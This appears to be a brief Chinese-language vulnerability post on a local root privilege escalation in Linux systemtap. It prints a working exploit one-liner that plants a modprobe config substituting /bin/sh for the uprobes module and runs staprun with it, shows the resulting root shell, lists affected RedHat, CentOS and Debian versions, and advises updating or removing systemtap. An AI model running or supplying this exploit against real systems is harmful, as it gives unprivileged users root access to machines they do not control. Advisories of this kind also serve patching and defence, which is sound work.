linux systemtap Local Root Privilege Escalation Vulnerability 导致本地提权漏洞
vulnerability, linux, 漏洞

利用代码:
[music@ST02 ~]$ printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever
sh-3.2#

已测试受影响的版本:
RedHat
Centos
debian
linux 2.6.18-194内核以下

RedHat(Centos) 已发布更新补丁

yum -y update systemtap
或者没有使用这个功能就卸载吧

有补丁的去打补丁吧.